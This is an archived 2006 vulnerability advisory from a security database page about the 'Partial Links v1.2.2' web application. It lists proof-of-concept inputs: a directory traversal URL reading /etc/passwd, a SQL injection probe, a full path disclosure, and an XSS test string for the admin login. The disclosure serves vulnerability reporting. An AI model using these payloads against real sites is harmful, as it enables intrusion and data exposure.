Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13007
HistoryJun 07, 2006 - 12:00 a.m.

Partial Links v1.2.2

2006-06-0700:00:00
vulners.com
6
JSON

Partial Links v1.2.2

Homepage:
http://www.particlesoft.net/particlelinks/

Effected files:
index.php
page_footer.php
admin.php

Exploits & Vulnerabilities:

Possible directory traversal?:
http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/

SQL Injection:
http://www.example.com/index.php?topic='

Full path disclosure via page_footer.php:
http://www.example.com/includes/page_footer.php

Fatal error: Call to a member function on a non-object in
/home/username/public_html/links/includes/page_footer.php

on line 3

((It should be notedpage_header.php gives full path errors too))

The input form box to login as admin can be spoofed to remove the max char limit allowed and the input
data isn't properally sanatized before being generated dynamically too.

For proof of concept try entering the following in the username box:

>'';!–"<XSS><img src=lol.jpg>=&{()}<

JSON